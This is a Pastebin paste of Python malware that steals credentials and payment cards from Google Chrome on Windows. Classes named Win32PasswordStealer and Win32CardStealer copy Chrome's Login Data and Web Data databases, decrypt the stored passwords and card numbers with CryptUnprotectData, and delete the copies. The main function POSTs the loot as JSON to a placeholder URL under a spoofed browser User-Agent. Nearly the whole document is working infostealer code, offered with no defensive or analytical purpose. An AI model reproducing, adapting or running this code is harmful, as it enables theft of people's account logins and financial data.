Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #Made by the meme factory
- #Copyright 2019
- #Imports
- import json
- import os
- import sys
- import win32crypt
- import sqlite3
- import shutil
- import urllib.request
- #Classes
- class Password:
- def __init__(self,url,username,password):
- self.url = url
- self.username = username
- self.password = password
- class CreditCard:
- def __init__(self,name,expiration,number):
- self.name = name
- self.expiration = expiration
- self.number = number
- class SQLite3Connection:
- def __init__(self,path):
- try:
- self.path = path
- self.connection = sqlite3.connect(self.path)
- self.cursor = self.connection.cursor()
- except:
- pass
- def run(self,query):
- try:
- self.cursor.execute(query)
- return self.cursor.fetchall()
- except:
- pass
- def close(self):
- self.connection.close()
- class Win32PasswordStealer:
- def __init__(self):
- self.chromepath = "{}\\Google\\Chrome\\User Data\\Default\\Login Data".format(os.getenv("LOCALAPPDATA"))
- self.path = shutil.copy(self.chromepath,"{}\\logins.bak".format(os.getenv("USERPROFILE")))
- self.connection = SQLite3Connection(self.path)
- def steal(self):
- try:
- rows = self.connection.run("SELECT action_url, username_value, password_value from logins")
- passwords = []
- if len(rows) > 0:
- for row in rows:
- url = row[0]
- username = row[1]
- try:
- password = win32crypt.CryptUnprotectData(row[2],None,None,None,0)[1].decode()
- except:
- pass
- if password:
- passwords.append(Password(url,username,password))
- self.connection.close()
- os.remove(self.path)
- return passwords
- except:
- pass
- class Win32CardStealer:
- def __init__(self):
- self.chromepath = "{}\\Google\\Chrome\\User Data\\Default\\Web Data".format(os.getenv("LOCALAPPDATA"))
- self.path = shutil.copy(self.chromepath,"{}\\cards.bak".format(os.getenv("USERPROFILE")))
- self.connection = SQLite3Connection(self.path)
- def steal(self):
- try:
- rows = self.connection.run("SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted from credit_cards")
- cards = []
- if len(rows) > 0:
- for row in rows:
- name = row[0]
- expiration = "{}/{}".format(row[1],row[2])
- try:
- number = win32crypt.CryptUnprotectData(row[3],None,None,None,0)[1].decode()
- except:
- pass
- if number:
- cards.append(CreditCard(name,expiration,number))
- self.connection.close()
- os.remove(self.path)
- return cards
- except:
- pass
- #Functions
- def main():
- try:
- passstealer = Win32PasswordStealer()
- cardstealer = Win32CardStealer()
- passwords = passstealer.steal()
- cards = cardstealer.steal()
- senddata = {"passwords": [],"cards": []}
- if passwords:
- for password in passwords:
- senddata["passwords"].append({
- "url": password.url,
- "username": password.username,
- "password": password.password
- })
- if cards:
- for card in cards:
- senddata["cards"].append({
- "name": card.name,
- "expiration": card.expiration,
- "number": card.number
- })
- reqbytes = json.dumps(senddata).encode()
- req = urllib.request.Request("any url")
- req.add_header("Content-Type","application/json; charset=utf-8")
- req.add_header("Content-Type",len(reqbytes))
- req.add_header("User-Agent","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36")
- urllib.request.urlopen(req,reqbytes)
- except:
- traceback.print_exc()
- sys.exit()
- #Main
- if __name__ == "__main__":
- main()
Add Comment
Please, Sign In to add comment